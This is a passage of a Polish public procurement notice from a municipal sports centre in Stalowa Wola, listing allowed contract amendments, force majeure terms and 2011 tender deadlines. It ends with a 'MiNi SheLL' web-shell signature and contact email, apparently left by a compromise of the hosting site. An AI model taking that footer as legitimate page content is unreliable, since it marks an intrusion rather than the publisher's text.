            organizacyjno-prawnej Wykonawcy, zmiana firmy, pod która działa Wykonawca, zmiana 
            osoby uprawnionej do składania oświadczeń w imieniu Wykonawcy, powodujących 
            potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych 
           dla Zamawiającego, w zakresie dokonanych zmian strukturalnych,
       U) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, 
            archeologicznymi lub terenowymi, a w szczególności: niewypały i niewybuchy, 
            wykopaliska archeologiczne,
      W) w przypadku kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty 
            inwestycji (w takim przypadku zmiany w umowie zostaną ograniczone do zmian 
            koniecznych, powodujących uniknięcie lub usuniecie kolizji),
       X) zmiany będące następstwem okoliczności leżących po Stronia Zamawiającego, 
            a w szczególności: 
            a) wstrzymanie robót przez Zamawiającego, 
            b) konieczność usunięcia błędów lub wprowadzenia zmian do dokumentacji projektowej   
                lub specyfikacji technicznej wykonania i odbioru robót, 
            c) zmiany będące następstwem działania organów administracji i innych podmiotów 
                o kompetencjach zbliżonych do organów administracji w szczególności eksploratorów 
                infrastruktury oraz właścicieli gruntów pod inwestycję a w szczególności:
                przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma 
                - typowych w danych okolicznościach, terminów wydania przez organy administracji 
                lub inne podmioty decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych 
                przez Wykonawcę, w tym odmowa udostępnienia przez właścicieli nieruchomości 
               do celów realizacji inwestycji,
       Y) możliwość dokonania każdej ze zmian, np.: w zakresie przedmiotu umowy, terminu 
            wykonania przedmiotu umowy, w przypadku, gdy z uwagi na liczne przeszkody 
            spowodowane na skutek siły wyższej wykonanie umowy stało się niemożliwe. Przez siłę 
            wyższą należy rozumieć zdarzenie zewnętrzne, wynikłe po podpisaniu umowy, którego 
            nie można było przewidzieć, uniknąć ani jemu zapobiec przy zachowaniu wszelkich 
            należytych środków, niezależnie od stron umowy. Zdarzeniami siły wyższej są między 
            innymi takie zdarzenia jak: klęski żywiołowe, anomalie klimatyczne, upadki meteorytów, 
            wojny, rewolucje, zamachy stanu, akty terrorystyczne, konfiskaty, nacjonalizacje i inne 
            podobne decyzje władz państwowych.
       Z) możliwość obniżenia wynagrodzenia Wykonawcy  w przypadku, gdy wady nie uniemożliwiają użytkowania przedmiotu odbioru zgodnie z przeznaczeniem, Zamawiający obniży wówczas wynagrodzenie stosownie do obniżonej wartości technicznej, użytkowej i estetycznej przedmiotu odbioru z zachowaniem rękojmi za ten element,
 
            Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.    
       Dokonanie zmian, o których mowa w ppktach A) - Z) wymienionych powyżej, wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mosir.stalowawola.pl/przetargi.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, 37-450 Stalowa Wola, ul. Hutnicza 15, sekretariat (I piętro) w godz. od 8:00 do 14:00, w dni robocze, po wcześniejszym uzgodnieniu terminu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2011 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, 37-450 Stalowa Wola, ul. Hutnicza 15, sekretariat (I piętro, pokój 101)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com